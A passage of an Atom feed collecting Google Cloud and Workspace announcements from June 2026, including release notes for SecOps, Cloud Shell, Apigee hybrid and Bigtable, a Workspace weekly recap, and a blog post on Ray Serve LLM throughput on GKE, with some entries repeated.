    <link href="https://googlecloudpresscorner.com/2026-06-21-DICT-and-Google-Cloud-Partner-on-Multi-Year-AI-and-Cybersecurity-Initiatives-to-Deliver-Next-Generation-Citizen-Services" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-22T03:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-21-DICT-and-Google-Cloud-Partner-on-Multi-Year-AI-and-Cybersecurity-Initiatives-to-Deliver-Next-Generation-Citizen-Services</id>
    <title>DICT and Google Cloud Partner on Multi-Year AI and Cybersecurity Initiatives to Deliver Next-Generation Citizen Services</title>
    <updated>2026-06-22T03:00:00+00:00</updated>
    <content type="html">Strategic collaboration advances the Philippine Development Plan 2023–2028, while empowering public servants with agentic AI tools to boost productivity and national cyber defense</content>
    <link href="https://www.googlecloudpresscorner.com/2026-06-21-DICT-and-Google-Cloud-Partner-on-Multi-Year-AI-and-Cybersecurity-Initiatives-to-Deliver-Next-Generation-Citizen-Services" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-22T03:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_21_2026</id>
    <title>Cloud Release Notes — June 21, 2026</title>
    <updated>2026-06-21T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Scheduled Maintenance&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;CloudSQL will undergo a scheduled minor upgrade this Sunday, June 21, 2026.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Release 6.3.90 is being rolled out to the first phase of regions as listed &lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/overview-and-introduction/soar-gradual-release"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This release contains internal and customer bug fixes.&lt;/p&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Scheduled Maintenance&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;CloudSQL will undergo a scheduled minor upgrade.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_21_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-21T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_20_2026</id>
    <title>Cloud Release Notes — June 20, 2026</title>
    <updated>2026-06-20T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Cloud Shell&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Cloud Shell no longer includes the Terraform CLI by default. Users can
&lt;a href="https://docs.cloud.google.com/shell/docs/configuring-cloud-shell#environment_customization"&gt;customize their environment&lt;/a&gt;
to install the CLI on environment startup, or
install the binary to their home directory to persist the install between
sessions.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/release-notes#June_14_2026"&gt;Release 6.3.89&lt;/a&gt; is now available for all regions.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_20_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-20T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-19-2026.html</id>
    <title>Google Workspace Weekly Recap - June 19, 2026</title>
    <updated>2026-06-19T10:06:13+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;New discoverable space setting in Google Chat&lt;/h3&gt;&lt;div&gt;Previously, spaces were either private (invite-only) or open (anyone in the organization can find and join). Discoverable spaces provide a new option between the two: they appear when users browse for spaces within their organization, but the conversation history and messages remain private until an owner or manager approves a user's request to join. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/discoverable-space-setting-chat.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Carrier Link for Google Voice&lt;/h3&gt;&lt;div&gt;Carrier Link allows Workspace customers to easily add phone numbers and calling plans from a certified local carrier, leveraging a pre-configured multi-tenant implementation of SIP Link. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/carrier-link-for-google-voice.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;AI note-taking is now available in Google Voice&lt;/h3&gt;&lt;div&gt;This powerful new feature records and transcribes calls, summarizes key points, and organizes action items, which are sent via Gmail and stored in the Voice app. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/AI-note-taking-in-google-voice.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Gemini in Chrome expands to more languages and regions, including Latin America, Africa, and the Middle East&lt;/h3&gt;&lt;div&gt;Many of Chrome's latest AI features are rolling out to users in Latin America, Africa, the Middle East, and more. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/expanded-availability-gemini-in-chrome.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Control whether your users can have temporary chats and delete conversations in the Gemini app&lt;/h3&gt;&lt;div&gt;We’re introducing two new administrator controls for the Gemini app (gemini.google.com) that allow end users to manage their own chat activity. Admins can now configure whether users can use temporary chats and delete their conversation history. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/temporary-chats-and-conversation-deletion-control-for-gemini.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Create longer Veo videos and generate multiple at once in Google Vids&lt;/h3&gt;&lt;div&gt;These updates provide all Vids users with the ability to create longer videos with consistent characters and generate multiple videos in parallel, enabling you to bring your vision to life faster than ever before. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/create-longer-veo-videos-and-generate-multiple-at-once-in-Google-Vids.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Enhanced AI avatar features and capabilities in Google Vids&lt;/h3&gt;&lt;div&gt;We’re excited to announce expanded language support, a new collection of avatar defaults, and the ability to direct your custom avatars to take action in any generated video. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/enhanced-ai-avatars-vids.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Custom event colors in Google Calendar&lt;/h3&gt;&lt;div&gt;Going forward, users are offered an expanded color palette so they can personalize events and visually organize their calendar with ease, giving each user access to up to 200 custom colors for individual events via both the native web and mobile apps as well as the Calendar API. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/custom-event-colors-in-google-calendar.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Make Gemini more helpful and relevant to your teaching goals with the Google Classroom app in Gemini&lt;/h3&gt;&lt;div&gt;Educators have shared that AI is especially helpful when it understands the context of their teaching environment, from tailoring resources toward student needs or building on their existing materials. To support this, Gemini will be able to collaborate with your Google Classroom, using context from your classes to inform its outputs or help complete tasks. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/classroom-app-in-gemini.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Improved management of secondary calendars via the Calendar API&lt;/h3&gt;&lt;div&gt;We’re introducing two enhancements to the Calendar API that make it easier for admins to programmatically manage secondary calendars within their organization: a transfer API and a filter for secondary calendars owned by your organization. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/secondary-calendar-management-API.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Google Meet now available on Android Auto&lt;/h3&gt;&lt;div&gt;We’re bringing the power of Google Meet to your vehicle's display with our new integration for Android Auto. This update makes it easy to safely stay connected and handle important meetings hands-free from behind the wheel. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-meet-now-available-on-android.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Expanded language support for building and editing spreadsheets with Gemini&lt;/h3&gt;&lt;div&gt;We’re now expanding support for these features to 28 additional languages, enabling users who speak Spanish, Portuguese, Japanese, Korean, Italian, French, German, Chinese Simplified, Dutch, Hebrew, Polish, Turkish, Czech, Indonesian, Malay, Swedish, Danish, Norwegian, Arabic, Finnish, Vietnamese, Ukrainian, Greek, Thai, Romanian, Russian, Catalan, and Hungarian to collaborate natively with Gemini in their preferred language. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/expanded-language-support-for-gemini-in-sheets.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: small; font-style: italic; white-space: pre-wrap;"&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/span&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-19-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-19T10:06:13+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-19-2026.html</id>
    <title>Google Workspace Weekly Recap - June 19, 2026</title>
    <updated>2026-06-19T10:06:13+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;New discoverable space setting in Google Chat&lt;/h3&gt;&lt;div&gt;Previously, spaces were either private (invite-only) or open (anyone in the organization can find and join). Discoverable spaces provide a new option between the two: they appear when users browse for spaces within their organization, but the conversation history and messages remain private until an owner or manager approves a user's request to join. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/discoverable-space-setting-chat.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Carrier Link for Google Voice&lt;/h3&gt;&lt;div&gt;Carrier Link allows Workspace customers to easily add phone numbers and calling plans from a certified local carrier, leveraging a pre-configured multi-tenant implementation of SIP Link. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/carrier-link-for-google-voice.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;AI note-taking is now available in Google Voice&lt;/h3&gt;&lt;div&gt;This powerful new feature records and transcribes calls, summarizes key points, and organizes action items, which are sent via Gmail and stored in the Voice app. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/AI-note-taking-in-google-voice.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Gemini in Chrome expands to more languages and regions, including Latin America, Africa, and the Middle East&lt;/h3&gt;&lt;div&gt;Many of Chrome's latest AI features are rolling out to users in Latin America, Africa, the Middle East, and more. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/expanded-availability-gemini-in-chrome.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Control whether your users can have temporary chats and delete conversations in the Gemini app&lt;/h3&gt;&lt;div&gt;We’re introducing two new administrator controls for the Gemini app (gemini.google.com) that allow end users to manage their own chat activity. Admins can now configure whether users can use temporary chats and delete their conversation history. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/temporary-chats-and-conversation-deletion-control-for-gemini.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Create longer Veo videos and generate multiple at once in Google Vids&lt;/h3&gt;&lt;div&gt;These updates provide all Vids users with the ability to create longer videos with consistent characters and generate multiple videos in parallel, enabling you to bring your vision to life faster than ever before. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/create-longer-veo-videos-and-generate-multiple-at-once-in-Google-Vids.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Enhanced AI avatar features and capabilities in Google Vids&lt;/h3&gt;&lt;div&gt;We’re excited to announce expanded language support, a new collection of avatar defaults, and the ability to direct your custom avatars to take action in any generated video. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/enhanced-ai-avatars-vids.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Custom event colors in Google Calendar&lt;/h3&gt;&lt;div&gt;Going forward, users are offered an expanded color palette so they can personalize events and visually organize their calendar with ease, giving each user access to up to 200 custom colors for individual events via both the native web and mobile apps as well as the Calendar API. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/custom-event-colors-in-google-calendar.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Make Gemini more helpful and relevant to your teaching goals with the Google Classroom app in Gemini&lt;/h3&gt;&lt;div&gt;Educators have shared that AI is especially helpful when it understands the context of their teaching environment, from tailoring resources toward student needs or building on their existing materials. To support this, Gemini will be able to collaborate with your Google Classroom, using context from your classes to inform its outputs or help complete tasks. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/classroom-app-in-gemini.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Improved management of secondary calendars via the Calendar API&lt;/h3&gt;&lt;div&gt;We’re introducing two enhancements to the Calendar API that make it easier for admins to programmatically manage secondary calendars within their organization: a transfer API and a filter for secondary calendars owned by your organization. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/secondary-calendar-management-API.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Google Meet now available on Android Auto&lt;/h3&gt;&lt;div&gt;We’re bringing the power of Google Meet to your vehicle's display with our new integration for Android Auto. This update makes it easy to safely stay connected and handle important meetings hands-free from behind the wheel. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-meet-now-available-on-android.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Expanded language support for building and editing spreadsheets with Gemini&lt;/h3&gt;&lt;div&gt;We’re now expanding support for these features to 28 additional languages, enabling users who speak Spanish, Portuguese, Japanese, Korean, Italian, French, German, Chinese Simplified, Dutch, Hebrew, Polish, Turkish, Czech, Indonesian, Malay, Swedish, Danish, Norwegian, Arabic, Finnish, Vietnamese, Ukrainian, Greek, Thai, Romanian, Russian, Catalan, and Hungarian to collaborate natively with Gemini in their preferred language. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/expanded-language-support-for-gemini-in-sheets.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: small; font-style: italic; white-space: pre-wrap;"&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/span&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-19-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-19T10:06:13+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_19_2026</id>
    <title>Cloud Release Notes — June 19, 2026</title>
    <updated>2026-06-19T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Apigee hybrid&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;h3 id="v1166"&gt;v1.16.6&lt;/h3&gt;
&lt;p&gt;On June 19, 2026 we released an updated version of the Apigee hybrid software, v1.16.6.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For information on upgrading, see &lt;a href="https://docs.cloud.google.com/apigee/docs/hybrid/v1.16/upgrade"&gt;Upgrading Apigee hybrid to version v1.16.6&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;For information on new installations, see &lt;a href="https://docs.cloud.google.com/apigee/docs/hybrid/v1.16/big-picture"&gt;The big picture&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;span&gt; This is a patch release: The container images used in patch releases are integrated with the Apigee hybrid Helm charts. Upgrading to a patch via the Helm chart automatically updates the images. No manual image changes are typically needed. For information on container image support in Apigee hybrid releases, see &lt;a href="https://docs.cloud.google.com/apigee/docs/release/apigee-release-process#apigee-hybrid-container-images"&gt;Apigee release process&lt;/a&gt;.&lt;/span&gt;&lt;/aside&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;HAProxy PROXY-protocol support on Apigee ingress gateway&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In this release, you can opt into HAProxy PROXY-protocol parsing by setting the &lt;a href="https://docs.cloud.google.com/apigee/docs/hybrid/v1.16/config-prop-ref#ingressgateways-proxyprotocol-mode"&gt;&lt;code&gt;ingressGateways[].proxyProtocol.mode&lt;/code&gt;&lt;/a&gt; property (with options &lt;code&gt;strict&lt;/code&gt;, &lt;code&gt;permissive&lt;/code&gt;, or &lt;code&gt;disable&lt;/code&gt;) in your overrides configuration file. The property defaults to &lt;code&gt;disable&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Various security and CVE fixes are included in this release.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Bigtable&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can use the Bigtable Studio explorer to search for all resources except for
authorized views and column families. For more information, see
&lt;a href="https://docs.cloud.google.com/bigtable/docs/manage-data-using-console"&gt;Manage your data using Bigtable Studio&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_19_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-19T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/containers-kubernetes/improving-ray-serve-llm-on-gke-throughput-latency</id>
    <title>Scaling Ray Serve LLM on GKE: Performance without losing the developer experience</title>
    <updated>2026-06-18T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers looking for LLM inference and model serving often turn to &lt;/span&gt;&lt;a href="https://docs.ray.io/en/latest/serve/index.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Ray Serve&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a scalable model serving library with developer-friendly, Python-native APIs built by Anyscale. Combined with Google Kubernetes Engine (GKE), developers have a powerful, unified platform optimized for demanding LLM serving use cases, spanning from initial model development to online production serving. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, that flexibility and feature set used to come at a cost to performance. But today, in partnership with Anyscale, &lt;/span&gt;&lt;a href="https://www.anyscale.com/blog/high-performance-distributed-inference-ray-serve-llm-vllm-google-kubernetes-gke" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we are delivering up to 5x higher throughput and 8x lower latency in Ray Serve&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, meeting the growing demands and rigorous performance requirements of state-of-the-art distributed inference, without having to sacrifice ease of use.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling inference without the bottlenecks&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through our joint engineering partnership, we are introducing three major architectural optimizations that dramatically improve Ray Serve LLM's performance characteristics:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Ray Serve HAProxy integration&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Ray Serve now builds in HAProxy to manage internal request routing and load balancing. This setup drastically reduces proxy overhead and prevents the Python runtime from saturating under high traffic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Direct token streaming architecture&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This architecture decouples the initial request path from the return stream. Tokens stream directly from individual model replicas back to the proxy, bypassing the ingress router completely for the streaming data path to cut latency.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;v2 Ray executor backend for vLLM&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The revamped Ray backend for vLLM moves Ray out of the data plane to enable asynchronous scheduling. This unifies the code path with native vLLM executors, closing the performance gap and helping to ensure Ray users benefit from the latest engine-level optimizations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Benchmarking performance on GKE&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve also collaborated with Anyscale to benchmark the updated Ray Serve LLM on GKE clusters utilizing next-generation AI hardware, including Google Cloud A4 VMs powered by &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/data-center/hgx/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA HGX B200&lt;/span&gt;&lt;/a&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;systems. We chose to run Gemma 4 E2B as a small, efficient model to isolate bottlenecks introduced from orchestration and routing. Our benchmarks compared the new Ray Serve LLM to its prior performance, as well as a plain vLLM setup using the Ray executor.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These technical enhancements deliver a transformative impact on performance, offering up to &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;5x higher throughput and 8x better latency&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; compared to previous Ray Serve configurations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The improved Ray Serve LLM demonstrated a remarkable improvement on a serving cluster with eight replicas, showing a scaling pattern that far exceeds previous performance, and showing comparable performance to running vLLM natively, but without the flexibility that Ray brings to the table.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_oOeVkik.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We observe that with an increasing number of concurrent users, Ray is now able to scale up throughput while maintaining a low 99th percentile time-to-first-token, where previously it struggled. Now LLM practitioners don’t have to sacrifice Ray’s rich features and ecosystem to get production-grade performance on Kubernetes.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Why choose GKE for Ray Serve&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GKE provides the foundational infrastructure that makes these software optimizations shine. When using the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/add-on/ray-on-gke/concepts/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Ray Operator add-on&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for GKE, you get turnkey deployment across Google Cloud's AI &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/tutorials/serve-llm-tpu-ray"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;accelerators&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including automated horizontal scaling, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/add-on/ray-on-gke/how-to/collect-view-logs-metrics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;monitoring&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/serve-multi-cluster-ray-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-cluster scaling&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and built-in fault tolerance. GKE abstracts the complex parts of orchestrating distributed physical hardware, so your team can focus on refining your models and application logic with Ray.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Try Ray Serve LLM on GKE&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We encourage developers to try out these enhancements in the latest Ray release (2.56 and later) and experience the future of high-performance LLM serving on GKE.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For more details, check out the following resources:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://www.anyscale.com/blog/high-performance-distributed-inference-ray-serve-llm-vllm-google-kubernetes-gke" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;New from Anyscale: High Performance Distributed Inference with Ray Serve LLM&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.ray.io/en/master/cluster/kubernetes/user-guides/kuberay-serve-high-throughput.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Enable High Throughput on Ray Serve with KubeRay&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/serve-multi-cluster-ray-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Serve an LLM with multi-cluster Ray Serve and GKE Inference Gateway&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/tutorials/serve-multi-host-tpu-llm"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Serve Gemma open models on GKE with Ray&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/containers-kubernetes/improving-ray-serve-llm-on-gke-throughput-latency" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/containers-kubernetes/improving-ray-serve-llm-on-gke-throughput-latency/</id>
    <title>Scaling Ray Serve LLM on GKE: Performance without losing the developer experience</title>
    <updated>2026-06-18T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers looking for LLM inference and model serving often turn to &lt;/span&gt;&lt;a href="https://docs.ray.io/en/latest/serve/index.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Ray Serve&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a scalable model serving library with developer-friendly, Python-native APIs built by Anyscale. Combined with Google Kubernetes Engine (GKE), developers have a powerful, unified platform optimized for demanding LLM serving use cases, spanning from initial model development to online production serving. &lt;/span&gt;&lt;/p&gt;
